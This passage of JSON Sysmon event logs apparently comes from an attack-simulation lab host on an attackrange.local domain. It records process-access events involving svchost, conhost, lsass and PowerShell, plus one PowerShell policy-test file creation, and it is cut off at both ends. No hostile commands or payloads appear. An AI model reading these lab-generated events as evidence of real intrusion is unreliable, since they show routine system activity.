06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.665\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.665","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.681\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vyuj05xu.f0j.ps1\r\nCreationUtcTime: 2020-08-01 06:55:14.681","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.681","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vyuj05xu.f0j.ps1","CreationUtcTime":"2020-08-01 06:55:14.681","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.712\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.712","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.712\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 